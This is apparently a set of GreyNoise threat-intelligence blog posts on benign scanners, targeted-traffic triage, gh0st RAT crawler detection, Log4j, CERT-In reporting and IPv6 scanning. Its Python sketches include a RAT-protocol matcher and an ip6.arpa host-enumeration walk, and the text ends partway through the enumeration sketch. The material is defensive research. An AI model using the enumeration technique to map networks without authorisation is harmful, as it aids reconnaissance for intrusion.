Insights

Blog posts in the Insights category.

Checking It Twice: Profiling Benign Internet Scanners — 2024 Edition

This is a follow-up to our October 2022 post, Sensors and Benign Scanner Activity.

Throughout the year, GreyNoise tends to focus quite a bit on the “naughty” connections coming our way. After all, that’s how we classify IP addresses as malicious so organizations can perform incident triage at light speed, avoid alert fatigue, and get a leg up on opportunistic attackers by using our IP-based block-lists.

At this time of year, we usually take some time to don our Santa hats and review the activities of the “nice” (a.k.a., “benign”) sources that make contact with our fleet.

Scanning the entire internet now drives both cybersecurity attack strategies and defense tactics. Every day, multiple legitimate organizations perform mass scanning of IPv4 space to gather data about exposed services, vulnerabilities, and general internet health. In November 2024, we deployed 24 new GreyNoise sensors across diverse network locations to study the behavior and patterns of these benign scanners.

Why This Matters

When organizations deploy new internet-facing assets, they typically experience a flood of inbound connection attempts within minutes. While many security teams focus on malicious actors, understanding benign scanning activity is equally crucial for several reasons:

  1. These scans generate significant amounts of log data that can obscure actual threats
  2. Security teams waste valuable time investigating legitimate scanning activity
  3. Benign scanners often discover and report vulnerable systems before malicious actors

The Experiment

We positioned 24 freshly baked sensors across five separate autonomous systems and eight distinct geographies and began collecting data on connection attempts from known benign scanning services. We narrowed the focus down to the top ten actors with the most tags in November. The analyzed services included major players in the internet scanning space, such as Shodan, Censys, and BinaryEdge, along with newer entrants like CriminalIP and Alpha Strike Labs.

Today, we’ll examine these services' scanning patterns, protocols, and behaviors when they encounter new internet-facing assets. Understanding these patterns helps security teams better differentiate between routine internet background noise and potentially malicious reconnaissance activity. There’s a “Methodology” section at the tail end of this post if you want the gory details of how the sausage was made.

The Results

We’ll first take a look at the fleet size of the in-scope benign scanners.

The chart below plots the number of observed IP addresses from each organization for the entire month of November vs. the total tagged interactions from those sources (as explained in the Methodology section). Take note of the tiny presence of both Academy for Internet Research and BLEXBot, as you won’t see them again in any chart. While they made the cut for the month, they also made no effort to scan the sensors used in this study.

As we’ll see, scanner fleet size does not necessarily guarantee nimbleness or completeness when it comes to surveying services on the internet.

Contact Has Been Made

The internet scanner/attack surface management (ASM) space is pretty competitive. One area where speed makes a difference is how quickly new nodes are added to the various inventories. All benign scanners save for ONYPHE (~9 minutes) and CriminalIP (~17 minutes) hit at least one of the target sensors within five minutes of the sensor coming online.

BinaryEdge and ONYPHE display similar dense clustering patterns, with significant activity bursts occurring around the 1-week mark. Their sensor networks appear to capture a high volume of unique IP contacts, forming distinctive cone-shaped distributions that suggest systematic scanning behavior.

Censys and Bitsight exhibit comparable behavioral patterns, though Bitsight’s first contacts appear more concentrated in recent timeframes. This could indicate a more aggressive or efficient scanning methodology for discovering new hosts.

ShadowServer shows a more dispersed pattern of first contacts, with clusters forming across multiple time intervals rather than concentrated bursts. This suggests a different approach to host discovery, possibly employing more selective or targeted scanning strategies.

Alpha Strike Labs and Shodan.io demonstrate sparser contact patterns, indicating either more selective scanning criteria or potentially smaller sensor networks. Their distributions show periodic clusters rather than continuous streams of new contacts.

CriminalIP presents the most minimal contact pattern, with occasional first contacts spread across the timeline. This could reflect a highly selective approach to host identification or a more focused scanning methodology.

The above graph also shows just how extensive some of the scanner fleets are (each dot is a single IP address making contact with one of the sensors; dot colors distinguish one sensor node from another).

If we take all that distinct data and whittle it down to count which benign scanners hit the most sensors first, we see that ONYPHE is the clear winner, followed by Censys — demonstrating strong but more focused scanning capabilities — with BinaryEdge coming in third.

The chart below digs a bit deeper into the first contact scenarios. We identified the very first contacts to each of the 24 sensor nodes from each benign scanner. ONYPHE shows a concentrated burst of activity in the 6-12 hour window, while Bitsight’s contacts are more evenly distributed throughout the observation period. Censys demonstrates a mixed pattern, with clusters in the early hours followed by sporadic contacts. ShadowServer exhibits a notably consistent spread of first contacts across multiple time windows.

BinaryEdge’s pattern suggests coordinated scanning activity, with tight groupings of contacts that could indicate automated discovery processes. Alpha Strike Labs shows a selective, possibly more targeted approach to first contact, while CriminalIP has minimal but distinct touchpoints. Shodan rounds out the observation set with periodic contacts that suggest a methodical scanning approach.

Speed Versus Reach

While speed is a critical competitive edge, coverage may be an even more important one. It’s fine to be the first to discover, but if you’re not making a comprehensive inventory, are you even scanning?

We counted up all the ports these benign scanners probed over the course of a week. Censys leads the pack with an impressive 36,056 ports scanned, followed by ShadowServer scanning 19,166 ports, and Alpha Strike Labs covering 14,876 ports.

ONYPHE, Shodan, BinaryEdge, and Bitsight seem to take similar approaches when it comes to probing for services on midrange and higher ports. All of them, save for CriminalIP, definitely know when you’ve been naughty and tried to hide some service outside traditional port ranges.

Before moving on to our last section, it is important to remind readers that we are only showing a 7-day view of activity. Some scanners, notably Censys, have much broader port coverage than a mere 55% of port space. The internet is a very tough environment to perform measurements in. Routes break, cables are cut, and even one small connection hiccup could mean a missed port hit. Plus, it’s not very nice to rapidly clobber a remote node that one is not responsible for.

Tag Time

The vast majority of benign contacts have no real payloads. Some of them do make checks for specific services or for the presence of certain weaknesses. When they do, the GreyNoise Global Observation Grid records a tag for that event. We wanted to see just how many tags these benign scanners sling our way.

Given ShadowServer’s mission, it makes sense that they’d be looking for far more weaknesses than the other benign scanners. The benign scanner organizations that also have an attack surface management (ASM) practice will also usually perform targeted secondary scans for customers who have signed up for such inspections.

In Conclusion

We hope folks enjoyed this second look at what benign scanners are up to and what their strategies seem to be when it comes to measuring the state of the internet.

If you have specific questions about the data or would like to see different views, please do not hesitate to contact us in our community Slack or via email at research@greynoise.io.

Methodology

Sensors were deployed between 2024-11-19 and 2024-11-26 (UTC) across five autonomous systems and in the IP space of the following countries:

  • Croatia
  • Estonia
  • Ghana
  • Kenya
  • Luxembourg
  • Norway
  • Slovenia
  • South Africa
  • Sweden

The in-scope benign actors (based on total tag hits across all of November):

Both Palo Alto’s Cortex Expanse and ByteSpider were in the original top ten, but were removed as candidates. Each of those services is prolific/noisy (one might even say “rude”) and would have skewed the results, making it impossible to compare the performance of these more traditional scanners. Furthermore, while ByteSpider may be (arguably) benign, it has more of a web-crawling mission that differs from the intents of the services on the rest of the actor list.

We measured the inbound traffic from the in-scope benign actors for a 7-day period.

Unfortunately, neither Academy for Internet Research nor BLEXBot reached out and touched these 24 new sensor nodes, and therefore they have no presence in the results.


How to know if I am being targeted

One of the most valuable attributes of GreyNoise is the ability to increase Security Operations Center efficiency by providing context, which allows the relevant security personnel to prioritize alerts. We listen and collect data from around the world from IP addresses that are opportunistically scanning the internet. We intentionally do not solicit traffic and rotate the IPs our services listen on frequently to preserve one of the most important attributes of the GreyNoise dataset: All traffic we observe is unsolicited in nature.

This attribute of our dataset allows us to quickly provide contextual information to answer the question, “Is my organization the victim of a targeted attack?”

On the left is the IP traffic GreyNoise can observe. On the right is the IP traffic a given organization may observe. Where these two groups overlap is the traffic seen by both GreyNoise and your organization. Unfortunately, this means that targeted network requests to your organization may frequently be outside of what GreyNoise can see.

If your organization observes traffic from an IP that has not been observed by GreyNoise, this traffic is likely targeted at your organization due to business verticals, software vendors in use, or implied value. Alerts falling into this category deserve a higher priority for investigation.

The largest volume of traffic targeted at your organization will likely be sourced from your desired user base or from automated tooling specific to your organization’s needs, such as API calls. As this is a near-constant occurrence, your security and infrastructure team are best equipped to recognize and identify what qualifies as normal.

Of course, there is also malicious network traffic targeted at your organization that GreyNoise may not have observed. Despite it being targeted, GreyNoise can still help provide context.

Consider that your organization has observed HTTPS traffic to the path “/v2.57/version” from an IP that GreyNoise has not observed. The GreyNoise Query Language (GNQL) supports wildcards, meaning that values and attributes of network requests that are specific to your organization, such as version differences in software, can be omitted in order to return query results that preserve the overall structure of the request.

Example: raw_data.web.paths:"/v*/version"

This allows you to surface IPs and context that GreyNoise has observed that share structural similarities with traffic observed by your organization that GreyNoise has not observed.
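If you prefer to script this kind of fuzzy pivot, the same GNQL query can be run against the GreyNoise API. The sketch below is illustrative only: the endpoint path, parameters, and response fields are assumptions based on the v2 GNQL API, and the API key is a placeholder, so verify everything against the current GreyNoise documentation before relying on it.

```python
# Illustrative sketch: run a wildcarded GNQL query via the GreyNoise API.
# Endpoint path, parameters, and response fields are assumptions -- verify
# against the current GreyNoise API documentation.
import requests

API_KEY = "YOUR-GREYNOISE-API-KEY"  # hypothetical placeholder
QUERY = 'raw_data.web.paths:"/v*/version"'

resp = requests.get(
    "https://api.greynoise.io/v2/experimental/gnql",
    params={"query": QUERY, "size": 50},
    headers={"key": API_KEY, "Accept": "application/json"},
    timeout=30,
)
resp.raise_for_status()

for hit in resp.json().get("data", []):
    # Print each source IP and its GreyNoise classification (benign/malicious/unknown)
    print(hit.get("ip"), hit.get("classification"))
```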

While this type of context association is fuzzy in nature, we can still quickly ascertain that the traffic observed by your organization is likely to be targeting web-accessible containerization software.

Since the traffic observed by your organization was HTTPS, you can further combine and pivot on stricter fingerprints such as JA3 hashes to rapidly create actionable documentation for investigations of targeted network traffic.

Spotlight vs lighthouse: crawling versus beaconing in Remote Access Trojans (RATs)

RAT nightmares in the SOC

If you’ve worked in a SOC, you might know this scene:

You clock into work, open the SIEM, and see RAT alerts. Hundreds of them.

Scary, right? Until one of your coworkers goes, “Oh, the RAT alerts. Yeah, just close those out; those are all false positives.”

But how can you be sure?

Actually, you cannot be sure - or, not right away. First, it is crucial to look into how the RATs - Remote Access Trojans - are communicating with each other and their command and control servers.

What’s the difference between beaconing and crawling?

Remote Access Trojans (malware used to establish persistent remote access to computers) are typically detected via their beaconing. As you can imagine, there are many methods for beaconing, multiplied across as many ports and protocols. In a single day, you might see a RAT “beaconing” via IRC, random UDP packets sent to a command and control server, feeding directly into a Discord bot, or even sending requests via the Gopher protocol.

The broadest definition of beaconing is when a RAT communicates to its Command and Control (C2) server. This often appears as if the machine itself is communicating with the RAT C2.

Crawling

Crawling, broadly defined, is a server scanning known IP addresses for machines with RATs installed. Before issuing commands from a command and control server, the operator needs to know which machines are infected and reachable. For that purpose, they may crawl the internet, sending a message to every machine and network that might have been infected and hoping for a response from the RAT itself.

Beaconing

We will often observe beaconing and crawling for the same malware, with the beacon and crawl playing a game of call-and-response between the infected machine and a command and control server.

Beaconing can be hard to verify. Sometimes we have observed unique packets on a seemingly random UDP port, only to find out telemetry is being sent by a legitimate program. Crawling, on the other hand, can be easier to find. Typically, a crawler sends a set payload in order to get a response from the RAT.

This article focuses on what we can do with crawling activity.

As an example, search for the tag “gh0st RAT crawler.” https://viz.greynoise.io/query/tags:%22Gh0st%20RAT%20Crawler%22

On this page, many results appear (with mixed reputations). Some of them are from other security companies doing routine scanning for gh0st RAT traffic to monitor the spread of the RAT. However, others are from anonymous servers and may be malicious.

These detections are from a tag GreyNoise has written based on a common hex-encoded header that the crawler sends when checking for gh0st RAT-infected machines.
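The exact header GreyNoise tags on is not published, but the general idea is easy to illustrate. The classic gh0st RAT protocol frames its traffic with a short magic marker (the default build uses the ASCII bytes “Gh0st”), two little-endian length fields, and a zlib-compressed body. The sketch below is a simplified, assumption-laden check along those lines; variant builds change the magic and layout, so treat it as an illustration of the concept rather than a detection rule.

```python
# Simplified sketch: does a captured payload resemble default-build gh0st RAT framing?
# The "Gh0st" magic and 13-byte header layout are assumptions drawn from public
# write-ups of the classic variant; real crawlers and RAT variants differ.
import struct
import zlib

def looks_like_gh0st(payload: bytes) -> bool:
    if len(payload) < 13 or not payload.startswith(b"Gh0st"):
        return False
    total_len, uncompressed_len = struct.unpack_from("<II", payload, 5)
    if total_len != len(payload):
        return False
    try:
        body = zlib.decompress(payload[13:])
    except zlib.error:
        return False
    return len(body) == uncompressed_len

# Synthetic example of a framed probe/response
body = zlib.compress(b"\x00\x00\x00")
sample = b"Gh0st" + struct.pack("<II", 13 + len(body), 3) + body
print(looks_like_gh0st(sample))  # True for this synthetic example
```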

I found crawler traffic on my network. What should I do?

Using the example of gh0st RAT crawler traffic, there are a few things you may want to consider.

One consideration is the kinds of devices being scanned: gh0st RAT is typically found on Windows machines. Is the crawler coming from a benign source and hitting a Linux server? Perhaps don’t worry about that.

Another factor is where in the network your machine is positioned. It is common for edge devices (web servers and firewalls are two examples) to be constantly scanned at all times by any number of devices for any number of reasons. Is the crawling excessive? You may want to check the source of the crawler to verify if it is a legitimate source. If not, it doesn’t hurt to block them at the firewall.

Finally, are your machines responding? If so, you may want to review your network for signs of compromise. Take stock of any outbound traffic your machine is sending in response to the crawler. If you see that your machine is already ignoring the crawler, you may want to run a quick antivirus scan for peace of mind and carry on. If you’re seeing unfamiliar responses or traffic that’s not usual for your network: perhaps run a thorough antivirus scan, disable RDP on the machine in question, and block the IP address trying to contact you. You may also want to conduct an internal investigation to make sure no data has been exfiltrated if you’re sure that there was a successful connection between your machine and the server trying to communicate with it.

This is where GreyNoise can help your process: by integrating GreyNoise into your environment, you can look for this crawling traffic and determine the reputation of whoever is doing the crawling, taking some of the leg work out of your investigation and response. When minutes count, even saving a few clicks can help.

Practical takeaways from CISA's Cyber Safety Review Board Log4j Report

The Cybersecurity and Infrastructure Security Agency (CISA)'s Cyber Safety Review Board (CSRB) was established pursuant to a May 2021 Executive Order and is charged with reviewing major cybersecurity incidents and issuing guidance and recommendations where necessary. GreyNoise is cited as a primary source of ground truth in the CSRB's first report (direct PDF), published on July 11, 2022, covering the December 2021 Log4j event. GreyNoise employees testified to the Cyber Safety Review Board on our early observations of Log4j. In this post, we'll examine key takeaways from the report through a GreyNoise lens and discuss what present-day Log4j malicious activity may portend.

Log4J retrospective

It may seem as if it's been a few years since the Log4j event ruined vacations and caused quite a stir across the internet. In reality, it's been just a little over six months since we published our "Log4j Analysis - What To Do Before The Next Big One" review of this mega-incident. Since that time, we've worked with the CSRB and provided our analyses and summaries of pertinent telemetry to help them craft their findings.

The most perspicacious paragraph in the CSRB's report may be this one:

Most importantly, however, the Log4j event is not over. The Board assesses that Log4j is an “endemic vulnerability” and that vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.

In fact, it reinforces their primary recommendation: "Organizations should be prepared to address Log4j vulnerabilities for years to come and continue to report (and escalate) observations of Log4j exploitation." (CSRB Log4j Report, pg. 6)

The CSRB further recommends (CSRB Log4j Report, pg. 7) that organizations:

  • develop strong configuration, asset, and vulnerability management practices
  • invest resources in the open-source ecosystems they depend upon
  • follow the lead of the Federal government and require and use Software Bill of Materials (SBOM) when sourcing software and components

This is all sound advice, but if your organization is starting from ground zero in any of those bullets, getting to a maturity level where they will each be effective will take time. Meanwhile, we've published three blogs on emerging, active exploit campaigns since the Log4j event:

Furthermore, CISA has added over 460 new entries to their ever-growing Known Exploited Vulnerabilities (KEV) catalog. That's quite a jump in the known attack surface, especially if you're still struggling to know whether any of the entries in the KEV catalog are in your environment.

While you're working on honing your internal asset, vulnerability, and software inventory telemetry, you can improve your ability to defend from emerging attacks by keeping an eye on attacker activity (something our tools and APIs are superb at), and ensuring your incident responders and analysts identify, block, or contain exploit attempts as quickly as possible. That's one area the CSRB took a light touch on in their report, but that we think is a crucial component of your safety and resilience practices.

Log4j today

Log4j is (sadly, unsurprisingly) alive and well:

This hourly view over the past two months shows regular, and often large, amounts of activity from a handful (~50) of internet sources. In essence, Log4j has definitely become one of the many permanent and persistent components of internet "noise," further confirming the CSRB's assessment that Log4j is here for the long haul. As if on cue, news broke of Iranian state-sponsored attackers using the Log4j exploit in very recent campaigns, just as we were preparing this post for publication.

If we take a look at what other activity is present from those source nodes, we make an interesting discovery:

While most of the nodes are only targeting the Log4j vulnerability, some are involved in SSH exploitation, hunting for nodes to add to the ever-expanding Mirai botnet clusters, or focusing on a more recent Atlassian vulnerability from this year.

However, one node has merely added Log4j to the inventory of exploits it has been using. It's not necessary to see all the tag names here, but you can explore these IPs in-depth at your convenience.

Building on the conclusion of the previous section, you can safely block all IPs associated with the Apache Log4j RCE Exploit Attempt tag or other emerging tags to give you and your operations teams breathing room to patch.

You are always welcome to use the GreyNoise product to help you separate internet noise from threats as an unauthenticated user on our site. For additional functionality and IP search capacity, create your own GreyNoise Community (free) account today.

Comply with CERT-In's new reporting requirements by cutting irrelevant alerts

TL;DR 

  • Indian Computer Emergency Response Team (CERT-In) issued sweeping new directions under sub-section (6) of section 70B of the Information Technology Act, 2000.
  • Mandates include reporting of ANY cyber security incident to CERT-In, including targeted scanning of systems, within 6 hours of noticing such incidents.
  • Enforcement deadline is 25-Sep-2022 and applies to virtually all organizations with operations in India.
  • GreyNoise helps customers comply with targeted scanning reporting requirements by allowing them to separate irrelevant "mass scanners" from targeted scanners. 

Ready for updated security incident reporting requirements from CERT-In?

On 28-April-2022, in light of escalating cyber attacks in India, the Indian Computer Emergency Response Team (CERT-In) issued new directions under sub-section (6) of section 70B of the Information Technology Act, 2000. Among other expanded requirements, the new directions mandate reporting of any cyber security incident, including targeted scanning of systems and data breaches, within 6 hours of noticing the incident to CERT-In. Prior to this change, CERT-In had been allowing organizations to report incidents within “a reasonable time.”

The implications and sweeping nature of the changes caused quite a stir in the security community when initially released, especially since organizations ranging from service providers, intermediaries, data centers, government entities, and corporations, all the way down to small and medium businesses, need to follow CERT-In requirements. 

The directions were to become effective 60 days from the date of issuance in April. However, after receiving a large volume of feedback from affected organizations, CERT-In extended the enforcement deadline to 25-September, 2022. Despite the reprieve on the enforcement deadline, responses to the CERT-In’s standing FAQ indicate that the national agency is not inclined to adjust the main provisions it introduced. 

GreyNoise helps customers identify and respond to opportunistic “scan-and-exploit” attacks in real time. In the case of CERT-In’s new reporting mandate, GreyNoise helps customers filter opportunistic mass-scanning activity out of their alerts, so they can focus (and report on) targeted scanning activity. GreyNoise’s guidance on how to automate the process of detecting and reporting on targeted scanning/probing of critical networks and systems is below.

Section 70B directions scope

At a high level, the new CERT-In directions require organizations to: 

  1. Enable logs of all their Information and Communication Technologies (ICT) systems
  2. Retain logs for 180 days 
  3. Synchronize time with National Informatics Centre’s Network Time Protocol
  4. Define a special point of contact for this activity and share their credentials with CERT-In 
  5. Ensure that Virtual Private Server (VPS) providers, cloud service providers, and Virtual Private Network Service (VPN service) providers maintain accurate information, such as name of the subscriber and IP address for a minimum of five years
  6. Report to CERT-In within 6 hours of any “qualified cybersecurity incidents,” which are summarized in the following excerpt from CERT-In Directions for Section 70B

CERT-In defines “Targeted scanning/probing of critical networks/systems” as: 

The action of gathering information regarding critical computing systems and networks, thus, impacting the confidentiality of the systems. It is used by adversaries to identify available network hosts, services and applications, presence of security devices as well as known vulnerabilities to plan attack strategies.

Not all scans are created equal

These days, every machine connected to the internet is exposed to scans and attacks from hundreds of thousands of unique IP addresses per day. While some of this traffic is from malicious attackers driving automated, internet-wide exploit attacks, a large volume of traffic is benign activity from security researchers, common bots, and business services. And some of it is just unknown. But taken together, this internet noise triggers potentially thousands of events requiring human analysis. Given the expansive wording and stringent timeline of the directions, it’s crucial to intelligently reduce the number of alerts that are in scope and quickly prioritize mass exploit and targeted activity. 

Automate reports of targeted scanning with GreyNoise 

Using GreyNoise, you can effectively identify IP addresses that are connecting to your network and prioritize those that are specifically targeting your organization (versus non-targeted, opportunistic scanning that can be ignored).

In this representative scenario, we have configured our perimeter firewalls to send logs to Splunk. 

Using the GreyNoise App for Splunk (which you can install from Splunkbase), you can configure the gnfilter command to query the IP addresses against GreyNoise API and only return events that GreyNoise has not observed.

Important note: GreyNoise data identifies IP addresses that “mass-scan” the internet, so if GreyNoise has NOT observed an IP address, that means it is potentially “targeted” scanning activity.

For better presentation, the results are deduplicated and stored as a table.

Within Splunk Enterprise, adjust the query to reflect events in the last 6 hours: 

By selecting Search, the query will enrich all the filtered IP addresses against GreyNoise data and return only those IP addresses that have not been observed across our distributed sensor network. 

In our case, the query returned seven IP addresses for which GreyNoise has not seen activity. 

Prioritize this filtered list for additional analysis to rule out targeted scanning on your infrastructure.
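If you are not running Splunk, the same filtering logic can be scripted directly against the GreyNoise API. The sketch below keeps only the IPs that GreyNoise has not observed mass-scanning, using the “quick” noise-check endpoint; the endpoint path and response fields are assumptions based on the v2 API, and the key and IPs are placeholders, so check the current documentation before using it.

```python
# Illustrative sketch: keep only source IPs that GreyNoise has NOT observed,
# i.e. candidates for targeted scanning. Endpoint and response fields are
# assumptions based on the v2 "quick" noise check -- verify against current docs.
import requests

API_KEY = "YOUR-GREYNOISE-API-KEY"  # hypothetical placeholder

def potentially_targeted(ips):
    unseen = []
    for ip in ips:
        resp = requests.get(
            f"https://api.greynoise.io/v2/noise/quick/{ip}",
            headers={"key": API_KEY},
            timeout=10,
        )
        resp.raise_for_status()
        if not resp.json().get("noise", False):
            unseen.append(ip)  # GreyNoise has not seen this IP mass-scanning
    return unseen

# Example: source IPs pulled from the last 6 hours of firewall logs (placeholders)
print(potentially_targeted(["203.0.113.7", "198.51.100.22"]))
```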

To automate this process going forward, save the query as an Alert. You can adjust the Cron Expression to set a query frequency. In this example, it is set to every 6 hours.
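For reference, an every-6-hours cadence in the Cron Expression field is typically written as 0 */6 * * * (minute 0 of every sixth hour); adjust the minute value if you want to stagger the search away from the top of the hour.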

Before clicking Save, consider two other helpful actions for configuration: setting a destination email address for the alert, and then formatting the results as a CSV file.

With the alert configured, our query will run every 6 hours to ensure that any IP addresses that should be prioritized for analysis are packaged in a CSV format for review.

Next steps

To learn more about how GreyNoise can help you comply with the updated reporting mandates from CERT-In, reach out to schedule a demo with one of our technical experts.

Your zero-day is just another day

GreyNoise often gets asked, “Do you see zero-day exploits in your dataset?”

If GreyNoise observes an exploit, it means that a non-zero proportion of the internet has observed it simultaneously as well. We often observe widespread exploitation of a vulnerability: either before a CVE is assigned, or before vendors provide any communication. Unfortunately, these exploits often go unnoticed due to a lack of widespread observability, lack of investigation, or lack of communication from vendors telling security teams they should be paying attention to suspicious payloads targeting devices.

GreyNoise (both as a product and platform) serves to increase context and security analyst efficiency so that more time can be spent investigating the aforementioned suspicious payloads. We are also uniquely positioned to provide context to security researchers and software vendors who are in the process of disclosing a new vulnerability.

Zero-day exploits and GreyNoise

When a vendor is made aware of a vulnerability, a common playbook unfolds. First, the relevant information is often kept tightly under wraps until a public communication is released, frequently delayed under the guise of “preventing malicious actors from obtaining useful information and giving customers more time to patch.”  Behind the scenes, the cybersecurity community hopes that the vendor is taking the time to work with various providers to develop detection rulesets and mitigation strategies.

The harsh reality is that “preventing malicious actors from obtaining useful information” and “giving customers time to patch” are mutually exclusive. If a software patch is available to customers, it can be compared to the prior version of the software, often clearly identifying the section of code that malicious actors should target. The false implication of this type of message is that the “exploitation clock” starts when the vendor’s PR team wants it to. 

Vendor PR teams are invited to work together with the GreyNoise Research team early in their investigations. Collaboration allows GreyNoise to share actionable intelligence on whether their yet-to-be-released security bulletin should be given a higher priority because, for example, GreyNoise observed their product being exploited 2 weeks ago.

An Invitation from the GreyNoise Research Team

The GreyNoise Research team explores and classifies network payloads from our vast array of sensors around the world. When a new vulnerability is disclosed, we can quickly determine if the vulnerability has been observed “in the wild” recently as well as historically (since our dataset goes back to 2020). This provides valuable intel for prioritizing vulnerability disclosure.

If you are a vendor or cybersecurity researcher working through a vulnerability disclosure, we encourage you to reach out to the Research team for coordination and actionable intel. In return, we can provide contextualized knowledge to the larger cybersecurity community and a name to label what GreyNoise is already seeing. It’s one of the ways we maximize security analyst efficiency and give fast context to what their teams are investigating.

Find us at research@greynoise.io.

GreyNoise data and the MITRE ATT&CK framework

One of the most frequent customer questions we get is: where can I best apply GreyNoise data? GreyNoise has a trove of data, but when talking about how to actually operationalize our datasets, one of the easiest use cases is through the lens of the MITRE ATT&CK framework.

GreyNoise data + the MITRE ATT&CK framework

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world observations. The ATT&CK framework was originally designed to standardize discussion of adversary behavior between the public and private sectors. Creating such a framework has allowed organizations to share remediation, mitigation, and detection strategies as they relate to adversary TTPs. Since its inception, it has become a globally adopted framework for organizations. For further information, check out the MITRE ATT&CK whitepaper.

GreyNoise has close to four thousand sensors distributed across the internet, passively listening to and capturing traffic from (good, bad, and unknown) actors conducting scans. Activity observed from these actors can include running large-scale nmap or masscan scans that indiscriminately search for devices, looking for exposed services or directories, or going beyond basic discovery to actively search for vulnerable devices and brute-force credentials. Because of the unique data GreyNoise gathers with our extensive sensor network, the two main ATT&CK tactics for which we see customers using GreyNoise data are Reconnaissance (TA0043) and Initial Access (TA0001).

Let’s look at a few examples of specific MITRE ATT&CK techniques and how customers are using GreyNoise to identify attacks better and earlier.

Example 1 - T1595  Active Scanning

Sub-techniques: T1595.001 Active Scanning: Scanning IP Blocks, T1595.002 Active Scanning: Vulnerability Scanning

This is one of our most frequent uses for GreyNoise. By this point, it is well-known that anything put online will be scanned at any time. However, this brings a huge challenge: identifying whether or not something is opportunistic activity, or whether someone is specifically targeting your organization. This hurdle becomes further compounded by the volume of alerts generated on this inbound traffic - volume that can quickly overwhelm even the largest security teams. 

When monitoring these devices and logging the data to a SIEM, one of the quickest ways to filter out noise and start to look at what is targeted is to compare that data against what GreyNoise has observed. Below, firewall data feeding into Splunk is enriched with GreyNoise to better understand what is hitting the firewall. By filtering data this way, teams can see context on most of the IPs to sort them out, quickly find what needs to be investigated, and avoid spending time tracking down IPs that are only opportunistically scanning the internet.

Filtering the data this way quickly sifts out opportunistic scan-and-exploit traffic, allowing teams to identify the IP addresses that should be prioritized for deeper investigation. Better yet, it yields additional context on the remaining IP addresses for further prioritization. Using GreyNoise data this way facilitates detection of attacks directed at your organization earlier in the kill chain.

Example 2 - TA0001 Initial Access

Techniques: T1189 Drive-by Compromise, T1190 Exploit Public-Facing Application

Another popular GreyNoise use case among customers is gaining a better understanding of hosts that are sending exploit payloads across the internet. At the time of this writing, GreyNoise observed almost 85,000 hosts over a 24-hour period that were opportunistically attempting to exploit systems at scale across the internet.

On closer re-examination of the GreyNoise-enriched firewall data, we can see many IPs along with information about the exploits being launched.

These enrichments correlate easily against vulnerability or ASM data to validate that no vulnerable configurations are exposed, allowing teams to quickly close an alert. This can also be used in conjunction with a SOAR tool to verify configurations.

For example, on hosts tagged as brute forcers by GreyNoise, it’s a fast step to see if there was a successful login from that IP. If there is, then panic is justified… but the most likely case is that there is no successful login and the alert can be closed without ever having to alert someone.

Diving in the IPv6 Ocean

The Future of IPv6 at GreyNoise

The GreyNoise research team has reviewed a ton of IPv6 research to provide a roadmap for the future of GreyNoise sensors and data collection. IPv6 is, without a doubt, a growing part of the Internet’s future. Google’s survey shows that adoption rates for IPv6 are on the rise and will continue to grow; the United States government has established an entire program and set dates for migrating all government resources to IPv6; and, most notably, the IPv4 exhaustion apocalypse continues to be an issue. As we approach a bright new future for IPv6, we must also expect IPv6 noise to grow. For GreyNoise, this presents a surprisingly difficult question: where do we listen from?

According to ZMap, actors searching for vulnerable devices can scan all 4.2 billion IPv4 addresses in less than 1 hour. Unlike IPv4 space, IPv6 is unfathomably large, weighing in at approximately 340 × 10^36 (about 3.4 × 10^38) addresses. Quick math allows us to estimate 6.523 × 10^24 years to scan all of IPv6 space at the same rate as one might use to scan IPv4 space. Sheer size prevents actors from surveying IPv6 space for vulnerabilities in the same way as IPv4.
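For the curious, the back-of-the-envelope arithmetic is easy to reproduce. The sketch below assumes the ZMap-style figure of one full IPv4 sweep (2^32 addresses) per hour; the exact rate you assume only shifts the answer by a small constant factor, which is why any reasonable estimate lands in the 10^24 to 10^25 year range.

```python
# Back-of-the-envelope: time to sweep IPv6 at an "all of IPv4 in ~1 hour" rate.
# The one-hour-per-IPv4-sweep rate is an assumption taken from the ZMap figure above.
ipv4_space = 2 ** 32                 # ~4.3 billion addresses
ipv6_space = 2 ** 128                # ~3.4 x 10^38 addresses
rate_per_hour = ipv4_space           # addresses probed per hour

hours = ipv6_space / rate_per_hour   # = 2^96 hours
years = hours / (24 * 365.25)
print(f"{years:.3e} years")          # on the order of 10^24 to 10^25 years
```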

But there’s a Hitlist?

Since actors cannot simply traverse the entire address space as they can with IPv4 space, determining where responsive devices might reside in IPv6 space is a difficult and time-consuming endeavor – as demonstrated by the IPv6 Hitlist Project. Projects like the Hitlist are critical as they allow academic researchers to measure the internet and provide context for the environment of IPv6. Without projects like this, we wouldn’t know adoption rates or understand the vastness of the IPv6 space. 

Research scanning is one of the internet’s most important types of noise. It also happens to be the only noise that GreyNoise marks as benign. Unfortunately, researchers aren’t the only ones leveraging things like the Hitlist to survey IPv6 space. Malicious actors also use these “found” responsive IPv6 address databases to hunt vulnerable hosts. To better observe and characterize the landscape of IPv6 noise, GreyNoise must ensure that our sensors end up on things like the IPv6 Hitlist.

One strategy is to place sensors inside of reserved IPv6 space. IPv6 addresses can be up to 39 characters long, proving a challenge to memorize compared to IPv4’s maximum of 15. Reliance on DNS will become even more prevalent as more organizations adopt IPv6, making reverse DNS a primary method for enumerating devices. Following the Nmap ip6.arpa scan logic, appending a nibble to an IPv6 prefix and performing a reverse DNS lookup returns one of two results: NXDOMAIN, indicating no entries below that prefix, or NOERROR, indicating at least one registered entry below it. This method can efficiently reduce the number of hosts scanned in an IPv6 prefix, but it does require knowing the appropriate IPv6 prefix to extend. Since GreyNoise already places sensors in multiple data centers and locations, any database like the IPv6 Hitlist will already include us.
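As a concrete (and heavily simplified) illustration of that reverse-DNS logic, the sketch below walks one level of the ip6.arpa tree for a prefix and reports which nibble branches return NOERROR versus NXDOMAIN. It uses the dnspython library and the 2001:db8::/32 documentation prefix purely as an example; real enumeration tools recurse much deeper and handle wildcards, timeouts, and rate limits.

```python
# Illustrative ip6.arpa nibble walk (one level deep) using dnspython (pip install dnspython).
# The prefix is the IPv6 documentation range and is used here only as an example.
import dns.resolver

# 2001:0db8::/32 reversed into nibble labels: 8.b.d.0.1.0.0.2
BASE = "8.b.d.0.1.0.0.2.ip6.arpa."

def branch_exists(label: str) -> bool:
    # NOERROR (even with an empty answer) means something is registered below
    # this branch; NXDOMAIN means the branch is empty.
    try:
        dns.resolver.resolve(f"{label}.{BASE}", "PTR", raise_on_no_answer=False)
        return True
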